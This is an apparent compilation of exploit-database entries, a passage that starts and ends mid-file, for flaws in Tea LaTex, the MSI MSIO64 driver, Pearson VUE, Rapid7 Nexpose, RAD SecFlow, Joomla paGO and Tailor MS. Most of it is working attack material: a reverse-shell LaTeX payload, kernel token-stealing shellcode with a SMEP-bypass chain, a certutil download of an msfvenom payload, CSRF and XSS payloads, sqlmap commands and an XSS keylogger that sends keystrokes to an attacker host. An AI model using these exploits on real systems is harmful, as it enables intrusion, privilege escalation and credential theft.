    "\r\n" +
    "123456\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" +
    "\r\n" +
    "100000\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_status\"\r\n" +
    "\r\n" +
    "1\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" +
    "\r\n" +
    "\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_language\"\r\n" +
    "\r\n" +
    "french-sw\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" +
    "\r\n" +
    "2\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" +
    "Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" +
    "\r\n" +
    "1\r\n" +
    "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n";
    // Copy the string into a byte array one character at a time so the body
    // is sent as raw bytes; every character above is ASCII, so charCodeAt()
    // never exceeds 255 and nothing is truncated.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Press me" onclick="GodMode();" />
</form>
</body>
</html>
# Exploit Title: Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)
# Google Dork: N/A
# Date: 2020-09-01
# Exploit Author: nepska
# Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org
# Software Link: https://github.com/ammarfaizi2/latex.teainside.org
# Version: v1.0
# Tested on: Kali linux / Windows 10
# CVE: N/A
# HTTP Request
POST /api.php?action=tex2png HTTP/1.1
Host: latex.teainside.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Origin: https://latex.teainside.org
DNT: 1
Connection: keep-alive
Referer: https://latex.teainside.org/
Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403
{"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"}
# Payload
\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}
# Attacker
nc -lvp 1234
/*
Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation
Date: 2020-09-24
Exploit Author: Matteo Malvica
Vendor Homepage: https://www.msi.com
Software Link: https://msi.gm/ABLTMNB
Driver: MSIO64.sys
SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD
Version: 1.0.0.8
Tested on: Windows 10 1709 [19041.1.amd64fre.vb_release.191206-1406]
MSI Ambient Link Driver 1.0.0.8 Kernel Stack Based Buffer Overflow / Local Privilege Escalation
CVE: CVE-2020-17382
Writeup: https://www.matteomalvica.com/blog/2020/09/24/weaponizing-cve-2020-17382/
Original advisory: https://www.coresecurity.com/core-labs/advisories/msi-ambient-link-multiple-vulnerabilities
*/
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>
#pragma warning( disable : 6387 )
// Triggers the kernel stack buffer overflow in MSIO64.sys (CVE-2020-17382,
// per the advisory title) through one DeviceIoControl call and then spawns
// cmd.exe.
//
//   hFile         - handle to the \\.\MsIo device (see GetDriverHandle)
//   kernel_base   - load address of ntoskrnl.exe; the gadget offsets below
//                   are added to it and are hard-coded for Windows 10 1709
//   pid           - PID whose primary token is overwritten with SYSTEM's
//                   (main passes the current process)
//   IoControlCode - the IOCTL code that reaches the vulnerable copy
//
// The 136-byte input buffer holds 72 bytes of filler followed by a return
// address chain: load a CR4 value with SMEP cleared, jump to the user-mode
// shellcode (which copies the SYSTEM token over this process's token),
// then reload the original CR4. A cmd.exe started afterwards from this
// process runs with the swapped token if the chain executed.
//
// Defender notes: from user mode the observable artefacts are a handle to
// \\.\MsIo, a DeviceIoControl with this control code, and an RWX
// VirtualAlloc in the same process; the driver-side fix is to validate the
// IOCTL input length before it is copied to a fixed-size stack buffer.
VOID eopMsio(HANDLE hFile, INT64 kernel_base, DWORD pid, DWORD IoControlCode) {
    // SHELLCODE FOR 1709 -- the KPCR/_ETHREAD/_EPROCESS offsets are version
    // specific. It walks ActiveProcessLinks to PID 4 (System), reads that
    // Token, walks again to the PID patched in below, overwrites that
    // process's Token, clears scratch registers and loads the original CR4
    // value into rcx for the "mov cr4, ecx" gadget that the chain returns to.
    BYTE token_steal[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00" // mov rdx, [gs:188h] ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00" // mov r8, [rdx + b8h] ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xe8\x02\x00\x00" // mov r9, [r8 + 2e8h] ; ActiveProcessLinks list head
        "\x49\x8B\x09" // mov rcx, [r9] ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8" // mov rdx, [rcx - 8] ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04" // cmp rdx, 4 ; Process with ID 4 is System process
        "\x74\x05" // jz found_system ; Found SYSTEM token
        "\x48\x8B\x09" // mov rcx, [rcx] ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1" // jmp find_system_proc ; Loop
        //found_system:
        "\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token
        "\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure
        //find cmd
        "\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId
        "\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0x9999 ;UniqueProcessId == target? (PLACEHOLDER, bytes 54-55 patched below)
        "\x74\x05" // jz found_cmd ;YES - move on
        "\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list
        "\xEB\xEE" // jmp find_cmd ;loop
        // found cmd
        "\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token
        "\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack
        "\x48\x31\xc0" // xor rax rax
        "\x48\x31\xf6" // xor rsi,rsi
        "\x48\x31\xff" // xor rdi, rdi
        "\x4D\x31\xC0" // xor r8, r8
        "\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx
        "\xc3"; // ret ; RET
    // Patch the imm32 of the "cmp rdx" above: only the low 16 bits of pid
    // are written into the 0x9999 placeholder.
    token_steal[54] = pid;
    token_steal[55] = pid >> 8;
    // RWX user-mode page for the shellcode; the return value is not checked
    // (warning 6387 is disabled at file scope), so a NULL would be
    // dereferenced by memcpy below.
    LPVOID allocated_shellcode = VirtualAlloc(NULL,
        sizeof(token_steal),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
    memcpy(allocated_shellcode, token_steal, sizeof(token_steal));
    // Gadget offsets relative to ntoskrnl.exe, valid for the 1709 build only.
    INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret
    INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret
    INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret
    INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP
    // Kept for reference only: the chain does not read this; the shellcode's
    // final "mov rcx, 0x1506f8" carries the same constant.
    INT64 rcx_old_value = 0x1506f8; // original cr4 value
    INT64 ret = pop_rcx_offset + 1; // RET NOP
    // Status message only; nothing has been sent to the driver yet.
    puts("[+] SMEP disabled");
    // 136-byte IOCTL input: filler, then 8-byte entries from offset 72 on.
    BYTE input_buff[136] = { 0 };
    memset(input_buff, '\x41', 64);
    memset(input_buff, '\x42', 8); // dummy RBP
    memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret
    memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode
    memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack
    memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack
    // Prints the address of the local pointer variable, not the allocation
    // it points to.
    printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode);
    DWORD lpBytesReturned = 0x0;
    // Deliver the crafted buffer to the driver.
    BOOL triggerIOCTL = DeviceIoControl(hFile,
        IoControlCode,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &lpBytesReturned,
        NULL);
    // A TRUE return is reported as success without any further verification.
    if (!triggerIOCTL) {
        printf("[!] DeviceIoControl failed: %d\n", GetLastError());
    }
    else {
        puts("[+] SMEP re-enabled");
        puts("[+] Enjoy your SYSTEM shell\n");
    }
    // Spawned regardless of whether the IOCTL reported success.
    system("start cmd.exe");
}
// Returns the load address of the kernel-mode driver whose base name equals
// drvname exactly (e.g. "ntoskrnl.exe"), or 0 when no such driver is listed.
// 0 is also returned when EnumDeviceDrivers fails or reports more entries
// than the 1024-slot local array can hold (a truncated list is not searched).
LPVOID GetBaseAddr(const char* drvname) {
    LPVOID loaded[1024];
    DWORD bytesNeeded = 0;

    if (!EnumDeviceDrivers(loaded, sizeof(loaded), &bytesNeeded)) {
        return 0;
    }
    // bytesNeeded >= sizeof(loaded) means the array was too small.
    if (bytesNeeded >= sizeof(loaded)) {
        return 0;
    }

    const int count = bytesNeeded / sizeof(loaded[0]);
    char baseName[1024];
    for (int idx = 0; idx < count; ++idx) {
        const DWORD nameLen = GetDeviceDriverBaseNameA(loaded[idx], baseName, sizeof(baseName) / sizeof(baseName[0]));
        // A zero length means the name could not be retrieved; skip the entry.
        if (nameLen != 0 && strcmp(baseName, drvname) == 0) {
            return loaded[idx];
        }
    }
    return 0;
}
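// Opens the MSIO64.sys control device \\.\MsIo for read/write access and
// returns the handle. On failure the Win32 error code is printed and the
// process exits with status 1, so callers never receive INVALID_HANDLE_VALUE.
// The handle is opened with FILE_FLAG_OVERLAPPED, as in the original.
// Defender note: user-mode access to this device name is the first step of
// the exploit; the device object's DACL decides which accounts can reach it.
HANDLE GetDriverHandle() {
    HANDLE hMsio;
    hMsio = CreateFileA("\\\\.\\MsIo",
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);
    if (hMsio == INVALID_HANDLE_VALUE) {
        // GetLastError() returns a DWORD (unsigned long), so %lu is the
        // matching conversion; %d was undefined for values above INT_MAX.
        printf("[-] Error obtaining an handle to the driver: %lu\n", GetLastError());
        exit(1);
    }
    return hMsio;
}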
// Entry point: prints the banner, opens the device, resolves the kernel base
// and hands everything to eopMsio() for the current process.
int main() {
    puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");
    // Control code of the vulnerable IOCTL in MSIO64.sys.
    const DWORD IoControlCode = 0x80102040;
    // GetDriverHandle() exits the process itself if the device cannot be opened.
    HANDLE hDevice = GetDriverHandle();
    const INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");
    const DWORD pid = GetCurrentProcessId();
    eopMsio(hDevice, nt, pid, IoControlCode);
    return 0;
}
# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
# Discovery by: Jok3r
# Discovery Date: 2020-09-14
# Vendor Homepage: https://home.pearsonvue.com/
# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
# Tested Version: 2.3.1911
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
#Description:
The Application Wrapper is the component that automates the Pearson VUE
Testing System. The Wrapper is a scheduler that runs in the background on
the test center’s server.
The VUEApplicationWrapper service has an unquoted service path and the
"\Pearson VUE\" directory has insecure file permissions (writable by Everyone),
so an unauthorized local user can escalate privileges to the VUEService user,
which has administrative rights.
# Detection of unquoted service path:
C:\Users\VUEService>wmic service get name, pathname, displayname, startmode
| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |
findstr /i /v """
VUE Application Wrapper
VUEApplicationWrapper C:\Pearson VUE\VUE
Testing System\bin\VUEWrapper.exe
Auto
C:\Users\VUEService>sc qc VUEApplicationWrapper
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VUEApplicationWrapper
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing
System\bin\VUEWrapper.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VUE Application Wrapper
DEPENDENCIES : lanmanworkstation
SERVICE_START_NAME : .\VUEService
#Detection of insecure file permissions:
PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
Directory: C:\
Path Owner Access
---- ----- ------
Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
#Exploit code:
@ECHO OFF
REM Pearson VUE VTS unquoted-service-path PoC (see the advisory header above).
REM Step 1: enumerate auto-start services outside C:\Windows whose path is not
REM quoted, then query the VUEApplicationWrapper service and the ACL on "C:\Pearson Vue\".
ECHO [+] executing command: "wmic service get
name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i
"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |
findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc VUEApplicationWrapper
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
ECHO [+] Enumeration was completed successfully.
::Create VUE.exe with following commands on your kali and serve it on port
80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>
LPORT=443 -f exe > VUE.exe
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your
privileges, you might be able to get VUEService user privileges after
windows was rebooted.
REM Step 2: stage VUE.exe in the directory the unquoted path is resolved through;
REM the service picks it up at the next boot. The fix is quoting the service
REM ImagePath and removing the Everyone:FullControl ACE on the install directory.
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson
VUE\VUE.exe"
ECHO [*] Downloading VUE executable...
PAUSE
IF EXIST "C:\Pearson VUE\VUE.exe" (
ECHO [+] The download was successful.
) ELSE (
ECHO [-] The download was unsuccessful.
PAUSE
)
ECHO [!] If you continue, system will be rebooted.
PAUSE
shutdown /r /t 0
::code end
# Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
# Date: 2020-08-31
# Exploit Author: Angelo D'Amato
# Vendor Homepage: https://www.rapid7.com
# Version: <=6.6.39
# CVE :N/A
Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation
Vendor: Rapid7
Product web page: https://www.rapid7.com
Affected version: <=6.6.39
Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support
the entire vulnerability management lifecycle, including discovery, detection,
verification, risk classification, impact analysis, reporting and mitigation.
It integrates with Rapid7's Metasploit for vulnerability exploitation.
Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path
that contains an unquoted element, in which the element contains whitespace
or other separators. This can cause the product to access resources in a parent
path, allowing local privilege escalation.
Tested on: Microsoft Windows 10 Enterprise, x64-based PC
Microsoft Windows Server 2016 Standard, x64-based PC
Vulnerability discovered by Angelo D'Amato
@zeroscience
Advisory ID: ZSL-2019-5587
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php
07.08.2020
--
C:\Users\test>sc qc nexposeengine
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: nexposeengine
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Nexpose Scan Engine
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
# Date: 2020-08-31
# Exploit Author: Uriel Yochpaz and Jonatan Schor
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
# Version: SecFlow-1v os-image SF_0290_2.3.01.26
# Tested on: RAD SecFlow-1v
# CVE : N/A
A vulnerability in the web-based management interface of RAD SecFlow-1v
could allow an unauthenticated, remote attacker to conduct a cross-site
request forgery (CSRF) attack on an affected system.
The vulnerability is due to insufficient CSRF protections for the web UI on
an affected device.
An attacker could exploit this vulnerability by persuading a user of the
interface to follow a malicious link. A successful exploit could allow the
attacker to perform arbitrary actions with the privilege level of the
affected user.
This could be exploited in conjunction with CVE-2020-13260.
# Proof of Concept
By persuading an authenticated user to open a web page containing the
following code:
<img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1">
A reboot operation would begin.
This attack could execute any operation available at the web-based
management interface (File uploads, Scheduled and immediate reboots,
Factory reset etc.)
# Full Account Takeover
As mentioned above, this exploit could be used in conjunction with
CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a
malicious file to a Stored-XSS vulnerable page, which could allow Full
Account Takeover.
For further information and full PoC:
https://github.com/UrielYochpaz/CVE-2020-13259
# Timeline
May 19th, 2020 - Vulnerability exposed.
May 19th, 2020 – Vulnerability reported to RAD.
May 21st, 2020 – Vulnerability reported to MITRE.
May 21st, 2020 – MITRE assigned CVE: CVE-2020-13259.
May 22nd, 2020 – Contacted RAD for further details and cooperation.
Aug 25th, 2020 – RAD patched the vulnerability.
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Date: 2020-08-31
# Exploit Author: Jonatan Schor and Uriel Yochpaz
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
# Version: SecFlow-1v os-image SF_0290_2.3.01.26
# Tested on: RAD SecFlow-1v
# CVE : N/A
A Stored-XSS vulnerability was found in multiple pages in the web-based
management interface of RAD SecFlow-1v.
An attacker could exploit this vulnerability by uploading a malicious file
as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as
the static key file in Configuration-Services-Security-OpenVPN-Static Keys.
These files content is presented to users while executing malicious stored
JavaScript code.
This could be exploited in conjunction with CVE-2020-13259
# Proof of Concept
Upload a file containing the following JS code:
<img src=x onerror=alert(1)>
Refresh the page and observe the malicious JS code execute every time you
browse the compromised page.
# Full Account Takeover
As mentioned above, this exploit could be used in conjunction with
CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file
to a Stored-XSS vulnerable page, which could allow Full Account Takeover.
For further information and full PoC:
https://github.com/UrielYochpaz/CVE-2020-13259
# Timeline
May 19th, 2020 - Vulnerability exposed.
May 19th, 2020 – Vulnerability reported to RAD.
May 21st, 2020 – Vulnerability reported to MITRE.
May 21st, 2020 – MITRE assigned CVE: CVE-2020-13260.
May 22nd, 2020 – Contacted RAD for further details and cooperation.
Aug 25th, 2020 – RAD patched the vulnerability.
# Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)
# Date: 2020-08-21
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.corephp.com/
# Software Link: https://www.corephp.com/joomla-products/pago-commerce
# Version: 2.5.9.0
# Tested on: Apache2
Vulnerable param: filter_published
-------------------------------------------------------------------------
POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1
filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
-------------------------------------------------------------------------
sqlmap poc:
sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published
[Gais Security]<https://www.gaissecurity.com>
[Gais Security]
[Gais Security]
Mehmet KELEPÇE
Penetration Tester | Red Team
# Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-09-14
# CVE ID: CVE-2020-23835
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS
# CWE-523: Unprotected Transport of Credentials
# CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
# Vulnerability Description:
# Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters Tailor Management System v1.0 allows remote attackers to harvest keys pressed via unauthenticated victim clicking malicious URL and typing.
# Reflected XSS Key Logger
import socket,sys,urllib,re
from thread import *
from colorama import Fore, Style
# Colour and style lookup tables used by every printed line in this script.
# F indexes Fore colours (0 = reset), S indexes Style modes (0 = reset all).
F = [Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE]
S = [Style.RESET_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT]
# Status prefixes: "ok" is a bright arrow pointing right, "err" one pointing left.
ok = ''.join([S[3], F[2], ')', F[5], '+++', F[2], '[', F[8], '========> ', S[0], F[0]])
err = ''.join([S[3], F[2], '<========', F[2], '(', F[5], '+++', F[2], '( ', F[0], S[0]])
# Short aliases for the three colours the banner and key box use.
R = Fore.RED
C = Fore.CYAN
G = Fore.GREEN
def urlEncode(javascript):
    """Percent-encode *javascript* for use in a URL query string (Python 2 urllib.quote)."""
    quote = urllib.quote
    return quote(javascript)
def genXssPayload(LHOST,LPORT):
    """Build the <script> block that is reflected through index.php's ``error`` parameter.

    LHOST, LPORT: host and port (both str) of the listener that receives the keys.
    Returns a str: a script that installs a document.onkeypress handler sending
    each typed character as a GET to http://LHOST:LPORT?KEY=<char>.

    Application-side mitigation is HTML-encoding the reflected parameter
    (htmlspecialchars); on the wire the tell-tale is a burst of one-character
    ``?KEY=`` GETs from the login page to a host outside the application's origin.
    """
    XSS_PAYLOAD = '<script>'
    XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();'
    XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {'
    XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);'
    XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;'
    XSS_PAYLOAD += 'xhr.open("GET", uri, true);'
    XSS_PAYLOAD += 'xhr.send();}'
    XSS_PAYLOAD += '</script>'
    return XSS_PAYLOAD
def clientthread(conn):
    """Per-connection handler run on its own thread: print the KEY= value of each request.

    conn: the accepted socket. Reads up to 1024 bytes at a time, extracts the
    single character after ``KEY=`` with a regex and prints it via printKey().
    Any exception — including the IndexError raised by ``key[0]`` when a
    request carries no ``KEY=<char>`` — lands in the bare except, which only
    closes the socket. The ``if not data`` check runs after the regex, so an
    empty read also ends here rather than via ``break``.
    """
    try:
        while True:
            data = conn.recv(1024)
            key = re.findall(r'KEY\=\w',data)
            key = re.sub('KEY\=','',key[0])
            print(printKey(key))
            if not data:
                break
    except:
        conn.close()
def banner():
    """Build the coloured ASCII-art title: cyan key boxes spelling X$$ K3Y L0GG3R in red."""
    frame_top = ' _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ \n'
    frame_lid = '|\ /|\ /|\ /| |\ /|\ /|\ /| |\ /|\ /|\ /|\ /|\ /|\ /|\n'
    frame_rim = '| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
    frame_mid = '| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n'
    frame_base = '|/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n'
    # The letter row alternates red glyphs with cyan frame pieces, so it is built inline.
    letters = C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | | | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | | | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n'
    rows = [C + frame_top, C + frame_lid, C + frame_rim, C + frame_mid, letters, C + frame_rim, C + frame_base]
    credit = ' '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n'
    return S[3] + ''.join(rows) + credit
def printKey(key):
    """Render one captured character *key* inside a small cyan key-cap box (the key in red)."""
    rows = [
        ' _______\n',
        ' |\ /|\n',
        ' | +---+ |\n',
        ' | | | |\n',
        ' | | ' + R + key + C + ' | |\n',
        ' | +---+ |\n',
        ' |/_____\|',
    ]
    return S[3] + ''.join(C + row for row in rows) + F[0] + S[0]
def header():
    """Return the dim one-line tool title printed above the banner."""
    title = 'Tailor MS v1.0 '
    subtitle = 'Reflected XSS Key Logger '
    return S[1] + F[2] + ' __---* ' + F[7] + title + F[2] + '| ' + F[7] + subtitle + F[2] + '*---__\n' + S[0]
def formatHelp(STRING):
    """Wrap *STRING* in bright red and reset styling afterwards."""
    return ''.join((S[3], F[2], STRING, S[0]))
if __name__ == "__main__":
    # Script entry point (Python 2: uses the `thread` module and urllib.quote).
    # Expects exactly three arguments: the web app base URL, and the host/port
    # on which this script listens for the reflected script's GET requests.
    print(header())
    print(banner())
    if len(sys.argv) != 4:
        print(ok+formatHelp(" Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0]))
        print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0]))
        print(err+"Try Again..\r\n")
        sys.exit(-1)
    WEBAPP_URL = sys.argv[1]
    LHOST = sys.argv[2]
    LPORT = sys.argv[3]
    # Normalise the base URL to end in "/" and point it at the login page.
    if not re.match(r".*/$", WEBAPP_URL):
        WEBAPP_URL = WEBAPP_URL+'/'
    WEBAPP_URL = WEBAPP_URL+'index.php'
    PAYLOAD = genXssPayload(LHOST,LPORT)
    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
    # The reflection point is the `error` query parameter of index.php; the page
    # echoes it without output encoding, which is the defect CVE-2020-23835 covers.
    print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n')
    print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n')
    LPORT = int(LPORT)
    # Plain TCP listener; each accepted connection is handed to clientthread().
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((LHOST,LPORT))
    print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0])
    s.listen(100)
    print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0])
    try:
        while 1:
            conn, addr = s.accept()
